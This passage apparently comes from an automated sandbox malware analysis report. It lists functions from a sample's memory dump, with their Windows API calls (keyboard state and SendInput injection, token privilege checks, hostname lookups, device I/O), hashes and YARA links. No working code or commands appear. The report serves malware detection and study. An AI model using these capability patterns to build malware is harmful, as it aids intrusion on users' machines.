                                                                            • Instruction ID: 2fb206fe5174f05800aed2df6a8ffb3b6c7a054824a760e35bd76ea14cd7c9fb
                                                                            • Opcode Fuzzy Hash: 469ee9d3e032bde89ce83e28060942dcce0c669270637bb5f843d8f7080542b4
                                                                            • Instruction Fuzzy Hash: 3A418B70A1410D9FDB22CF98C894BADBBF9FB49391F1481B9EA189B251D730A851CF50
                                                                            Function 002D12D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 002D1326
                                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 002D1342
                                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 002D13A8
                                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 002D13FA
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 1af75c392aa3c0797ec5b581eb26bcca2d3c44f7fee881b7e08beb40b5ed7d48
                                                                            • Instruction ID: 1cd587e2a05fcf5a76288210dd85ab693ceadc8e423cb21811545617dbabb9e7
                                                                            • Opcode Fuzzy Hash: 1af75c392aa3c0797ec5b581eb26bcca2d3c44f7fee881b7e08beb40b5ed7d48
                                                                            • Instruction Fuzzy Hash: 8F315770E64209BEFB358E658C05BFEBBA9AB45320F04428BE48052FD4C3748D719B51
                                                                            Function 002D1410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 002D1465
                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 002D1481
                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 002D14E0
                                                                            • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 002D1532
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 2c66786c32101766fcca002a2391167460c2ee43a048990b35c7c68ad80d8a17
                                                                            • Instruction ID: 5ab7e19dd33341f15a3f464acdf51f7d643caa1fd873f82ce353de68b0e0a79c
                                                                            • Opcode Fuzzy Hash: 2c66786c32101766fcca002a2391167460c2ee43a048990b35c7c68ad80d8a17
                                                                            • Instruction Fuzzy Hash: 65316C30E6020A7EFF358E659C14BFABBA9AB85310F48431BE49152BD1C3788D719B61
                                                                            Function 002A63F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002A642B
                                                                            • __isleadbyte_l.LIBCMT ref: 002A6459
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002A6487
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002A64BD
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: 6d6d4d203025b0dae36ea6ae4938aafb034712038b08aaee125f4f6d356bc92c
                                                                            • Instruction ID: f0c8b8581e424021d8319570feaa535fa30b6b248baae6c70e8f566c8f668ede
                                                                            • Opcode Fuzzy Hash: 6d6d4d203025b0dae36ea6ae4938aafb034712038b08aaee125f4f6d356bc92c
                                                                            • Instruction Fuzzy Hash: E631C431624256AFDF358F75CC48BAA7BA9FF46310F194029F86497191DF31E860DB50
                                                                            Function 002F552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 002F553F
                                                                              • Part of subcall function 002D3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002D3B4E
                                                                              • Part of subcall function 002D3B34: GetCurrentThreadId.KERNEL32 ref: 002D3B55
                                                                              • Part of subcall function 002D3B34: AttachThreadInput.USER32(00000000,?,002D55C0), ref: 002D3B5C
                                                                            • GetCaretPos.USER32(?), ref: 002F5550
                                                                            • ClientToScreen.USER32(00000000,?), ref: 002F558B
                                                                            • GetForegroundWindow.USER32 ref: 002F5591
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            • Opcode ID: 3de312b650d2a4144fdd0d6e7517c70fae4a380dcc46bb27a0e78dbd5c98292c
                                                                            • Instruction ID: e66cbbb613453d4ff38096a5017279b638cd244ca35ce9a2718d1fd5bce7a13c
                                                                            • Opcode Fuzzy Hash: 3de312b650d2a4144fdd0d6e7517c70fae4a380dcc46bb27a0e78dbd5c98292c
                                                                            • Instruction Fuzzy Hash: 2D312A71911108AFDB14EFA5C885AEEB7FDEF98304F10806AE555E7241EB75AE108FA0
                                                                            Function 002FCB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • GetCursorPos.USER32(?), ref: 002FCB7A
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,002ABCEC,?,?,?,?,?), ref: 002FCB8F
                                                                            • GetCursorPos.USER32(?), ref: 002FCBDC
                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,002ABCEC,?,?,?), ref: 002FCC16
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                            • String ID:
                                                                            • API String ID: 2864067406-0
                                                                            • Opcode ID: 5a40ce1b77c4e39d5fa30282cf96de4fc80fb76e65ad884d0194f27d7ce61b50
                                                                            • Instruction ID: 3e33c95505370fe14ae178d3e93a7d53c5d4223236e543b7d07f2bc710eab499
                                                                            • Opcode Fuzzy Hash: 5a40ce1b77c4e39d5fa30282cf96de4fc80fb76e65ad884d0194f27d7ce61b50
                                                                            • Instruction Fuzzy Hash: 8631813951001CAFCB268F95CC99EBEBBB9EB49350F144069FA059B261C7315D61DF60
                                                                            Function 00290BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __setmode.LIBCMT ref: 00290BE2
                                                                              • Part of subcall function 0028402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002D7E51,?,?,00000000), ref: 00284041
                                                                              • Part of subcall function 0028402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002D7E51,?,?,00000000,?,?), ref: 00284065
                                                                            • _fprintf.LIBCMT ref: 00290C19
                                                                            • OutputDebugStringW.KERNEL32(?), ref: 002C694C
                                                                              • Part of subcall function 00294CCA: _flsall.LIBCMT ref: 00294CE3
                                                                            • __setmode.LIBCMT ref: 00290C4E
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                            • String ID:
                                                                            • API String ID: 521402451-0
                                                                            • Opcode ID: d5557dfd3ec412701a8ce2cb31020a64fff8c1341d27b5b2295aa3978f0b8eba
                                                                            • Instruction ID: 4d4867f2472741cbd5888a40d9cd4f5c9e2ba4294ef18e2b49b11583f2319aeb
                                                                            • Opcode Fuzzy Hash: d5557dfd3ec412701a8ce2cb31020a64fff8c1341d27b5b2295aa3978f0b8eba
                                                                            • Instruction Fuzzy Hash: 35112731925108AEDF18B7A4AC46EBE776D9F45321F10011AF104562C2DF715D734BA1
                                                                            Function 002C9274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002C8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002C8D3F
                                                                              • Part of subcall function 002C8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D49
                                                                              • Part of subcall function 002C8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D58
                                                                              • Part of subcall function 002C8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D5F
                                                                              • Part of subcall function 002C8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D75
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002C92C1
                                                                            • _memcmp.LIBCMT ref: 002C92E4
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002C931A
                                                                            • HeapFree.KERNEL32(00000000), ref: 002C9321
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                            • String ID:
                                                                            • API String ID: 1592001646-0
                                                                            • Opcode ID: 1f49b16c9f085ed5a953fcf05b45bb4292f1669b4928d067bf8b90d5a8dabdce
                                                                            • Instruction ID: 1dcaf42912e4be935d2330465c11ddd91b5edd2abf0a9393080469476f5649bf
                                                                            • Opcode Fuzzy Hash: 1f49b16c9f085ed5a953fcf05b45bb4292f1669b4928d067bf8b90d5a8dabdce
                                                                            • Instruction Fuzzy Hash: FE21AC32E51109AFDB14CFA4C948FEEB7B8EF44301F04419DE885AB290D770AA54CF90
                                                                            Function 002F634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 002F63BD
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002F63D7
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002F63E5
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002F63F3
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayered
                                                                            • String ID:
                                                                            • API String ID: 2169480361-0
                                                                            • Opcode ID: c43874a67c1f07970f9b0b3fe9d454832398ce287e9267986a41fd1de3262e08
                                                                            • Instruction ID: e8d79bf4c745b6fb77dd94f67f9ceeebd34d51ce929049aa585d990646201570
                                                                            • Opcode Fuzzy Hash: c43874a67c1f07970f9b0b3fe9d454832398ce287e9267986a41fd1de3262e08
                                                                            • Instruction Fuzzy Hash: 6F110331325518AFD705AB28CC58FBAB7A9EF45720F148169F91AC72D2CBB0AD10CF90
                                                                            Function 002CE45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002CF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,002CE46F,?,?,?,002CF262,00000000,000000EF,00000119,?,?), ref: 002CF867
                                                                              • Part of subcall function 002CF858: lstrcpyW.KERNEL32(00000000,?,?,002CE46F,?,?,?,002CF262,00000000,000000EF,00000119,?,?,00000000), ref: 002CF88D
                                                                              • Part of subcall function 002CF858: lstrcmpiW.KERNEL32(00000000,?,002CE46F,?,?,?,002CF262,00000000,000000EF,00000119,?,?), ref: 002CF8BE
                                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,002CF262,00000000,000000EF,00000119,?,?,00000000), ref: 002CE488
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,002CF262,00000000,000000EF,00000119,?,?,00000000), ref: 002CE4AE
                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,002CF262,00000000,000000EF,00000119,?,?,00000000), ref: 002CE4E2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                            • String ID: cdecl
                                                                            • API String ID: 4031866154-3896280584
                                                                            • Opcode ID: 7560df25fc0465b4ae864ce86978f9875e022e86fc385eac2342a5bd828989ea
                                                                            • Instruction ID: 70cf8cf3b94b9c7321b629b53723e93df2b79fc8b3a9d27bf23a254249d16f7c
                                                                            • Opcode Fuzzy Hash: 7560df25fc0465b4ae864ce86978f9875e022e86fc385eac2342a5bd828989ea
                                                                            • Instruction Fuzzy Hash: CB11513A110345AFDF299F24D845E7A77A9FF45350B81412EF806CB2A0EB719961CB91
                                                                            Function 002A5312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 002A5331
                                                                              • Part of subcall function 0029593C: __FF_MSGBANNER.LIBCMT ref: 00295953
                                                                              • Part of subcall function 0029593C: __NMSG_WRITE.LIBCMT ref: 0029595A
                                                                              • Part of subcall function 0029593C: RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,?,00000004,?,?,00291003,?), ref: 0029597F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap_free
                                                                            • String ID:
                                                                            • API String ID: 614378929-0
                                                                            • Opcode ID: cf6e8c7cfe741646b87f8903694450dbce5a1ac17a8ce9db170ca74a4371e1e2
                                                                            • Instruction ID: da0e5c15b650623d9a6aa5126c83e0a58504e5677b51b14ffceb2aaef642c9fa
                                                                            • Opcode Fuzzy Hash: cf6e8c7cfe741646b87f8903694450dbce5a1ac17a8ce9db170ca74a4371e1e2
                                                                            • Instruction Fuzzy Hash: 5C113A32535E26EFCF263F70AC0075F37D89F963A0F1004A6F8089A190CFB489608B90
                                                                            Function 002D4365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002D4385
                                                                            • _memset.LIBCMT ref: 002D43A6
                                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002D43F8
                                                                            • CloseHandle.KERNEL32(00000000), ref: 002D4401
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                            • String ID:
                                                                            • API String ID: 1157408455-0
                                                                            • Opcode ID: fd35f602d0f9760959ba905bf351cb11e2600ba784b0250b2772e7a062806bde
                                                                            • Instruction ID: 45d984c393f048121cbc58faa152880fa0c3a9666feaec72f4419a52e6f2e02a
                                                                            • Opcode Fuzzy Hash: fd35f602d0f9760959ba905bf351cb11e2600ba784b0250b2772e7a062806bde
                                                                            • Instruction Fuzzy Hash: 7A11E7759122287AD7309BA5AC4DFABBB7CEF44720F1045DBF908E7280D6704E808BA4
                                                                            Function 002E6A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0028402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002D7E51,?,?,00000000), ref: 00284041
                                                                              • Part of subcall function 0028402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002D7E51,?,?,00000000,?,?), ref: 00284065
                                                                            • gethostbyname.WSOCK32(?,?,?), ref: 002E6A84
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E6A8F
                                                                            • _memmove.LIBCMT ref: 002E6ABC
                                                                            • inet_ntoa.WSOCK32(?), ref: 002E6AC7
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                            • String ID:
                                                                            • API String ID: 1504782959-0
                                                                            • Opcode ID: 22de40a4404712caa1538343361f6b9c154853eb9b1d85ed4fb22fabbca20ed1
                                                                            • Instruction ID: af3aacfb118c00bb61a4a0373607c261d96fd37c3468c6f41c2b5fd2c2a5f102
                                                                            • Opcode Fuzzy Hash: 22de40a4404712caa1538343361f6b9c154853eb9b1d85ed4fb22fabbca20ed1
                                                                            • Instruction Fuzzy Hash: 54114F76910109AFCB05FFA5CD56DEEB7BCAF14310B148065F506A72A1DF319E248FA1
                                                                            Function 0027166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 002716B4
                                                                            • GetClientRect.USER32(?,?), ref: 002AB93C
                                                                            • GetCursorPos.USER32(?), ref: 002AB946
                                                                            • ScreenToClient.USER32(?,?), ref: 002AB951
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 4127811313-0
                                                                            • Opcode ID: 684ad30f1bc1cb7457bcea0c5072db727dd6595335e1501f80f42fbadf816ce8
                                                                            • Instruction ID: b3bd1c31d836526341b5696d92f45b89abcdee1da76410cdcf9fb9d3e886b58c
                                                                            • Opcode Fuzzy Hash: 684ad30f1bc1cb7457bcea0c5072db727dd6595335e1501f80f42fbadf816ce8
                                                                            • Instruction Fuzzy Hash: 9F114375A2101AABCB15EFA8C8999BE77BDEF05300F14445AE905E7140C730BA61CFA1
                                                                            Function 002C96F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 002C9719
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002C972B
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002C9741
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002C975C
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
